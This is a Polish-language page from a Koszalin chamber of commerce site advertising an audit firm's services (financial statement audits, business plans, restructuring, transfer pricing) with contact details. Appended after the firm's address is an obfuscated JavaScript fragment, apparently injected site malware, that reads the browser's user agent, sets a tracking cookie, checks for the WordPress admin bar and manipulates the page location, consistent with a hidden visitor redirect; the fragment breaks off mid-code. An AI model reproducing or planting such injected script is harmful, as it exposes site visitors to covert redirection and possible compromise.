Zaproszenie do współpracy | Północna Izba Gospodarcza w Koszalinie

DEBET AUDYT FINANSE Spółka  z o.o.  zaprasza Państwa do współpracy w zakresie:

  • badania sprawozdań finansowych,
  • przygotowywania biznes planów oraz dokumentów dla instytucji finansujących wraz z doborem sposobów finansowania i  uzyskaniem odpowiednich decyzji,  
  • wykonywanie analiz ekonomiczno-finansowych,
  • przygotowywanie programów naprawczych i restrukturyzacyjnych,
  • sporządzanie dokumentacji cen transferowych,
  • przygotowywanie planów przekształceń własnościowych, fuzji i podziałów,
  • przeprowadzanie postępowań sanacyjnych,
  • pomoc prawną między innymi w zakresie opracowywania umów spółek wraz z rejestracją w KRS.

Nasz Zespół pomoże Tobie również zaplanować i przeprowadzić rozwój Twojej Firmy!

Zapraszamy  na stronę internetową www.audytfinanse.com oraz do kontaktu:
dr Aneta Szadkowska +48 501 775 900, Krzysztof Makurat +48 572 573 014.

Debet Audyt Finanse Spółka z o.o.
Wpisana na listę firm audytorskich pod numerem 4199
H.Modrzejewskiej 71A
75-528 Koszalin 'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m